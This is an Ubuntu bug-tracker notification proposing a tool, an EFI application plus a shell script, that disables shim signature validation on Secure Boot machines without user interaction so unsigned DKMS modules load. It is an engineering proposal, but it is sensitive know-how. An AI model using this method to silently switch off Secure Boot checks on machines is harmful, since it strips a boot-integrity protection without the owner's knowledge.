Public bug reported: In some secureboot enabled machines, after update to kernel 3.19 without disabling the secureboot. It causes the some DKMS (for example, kernel wireless and audio) won't work, because it forces the kernel and modules need to be signed.
Considering that the end users don't have enough knowledge to use "mokutil" to disable the shim signature validation, provide a way to disable signature validation on shim without user interactions. MokSBStateSet.efi - UEFI shell application to set two variables (MokSBState and MokSBStateRT) which disable signature validation on shim. It should be signed with Ubuntu key. shim_dis_validation.sh - create a bootentry and set bootnext to it. This bootentry will boot to shim and then base on loadoption (second stage boot on shim) to execute MokSBStateSet.efi. That's why MokSBStateSet.efi need to be signed and key must be in the MOK database under secureboot enabled. MOK database already has canonical key, so MokSBStateSet.efi should be signed with Ubuntu key, so that users don't do anything to import key to MOK database. [Execute] Put MokSBStateSet-signed.efi and shim_dis_validation.sh in the same folder #sudo sh shim_dis_validation.sh [Test case] 1. Get the signed MokSBStateSet.efi, MokSBStateSet-signed.efi 2. impoll key to MOK database, this is not necessary if MokSBStateSet.efi signed with canonical key # mokutil --import MOK.cer 3. sudo sh shim_dis_validation.sh 4. check the DKMS funcitons [Potential issue] Shim has a bug and cause the shim second stage fail and a fix with it, https://bugs.launchpad.net/ubuntu/+source/shim/+bug/1581299 Will need to change the loadoption data on shim_dis_validation.sh according to the shim version in the future releases. [Todo] MokSBStateSet.efi need to be signed with Canonical key. ** Affects: shim-signed (Ubuntu) Importance: Undecided Assignee: Ivan Hu (ivan.hu) Status: Confirmed ** Attachment added: "shim_dis_valid.tar.gz" https://bugs.launchpad.net/bugs/1609209/+attachment/4712747/+files/shim_dis_valid.tar.gz ** Changed in: shim-signed (Ubuntu) Assignee: (unassigned) => Ivan Hu (ivan.hu) -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/1609209 Title: Disable signature validation on shim without user interactions under secureboot enabled To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/shim-signed/+bug/1609209/+subscriptions -- ubuntu-bugs mailing list [email protected] https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
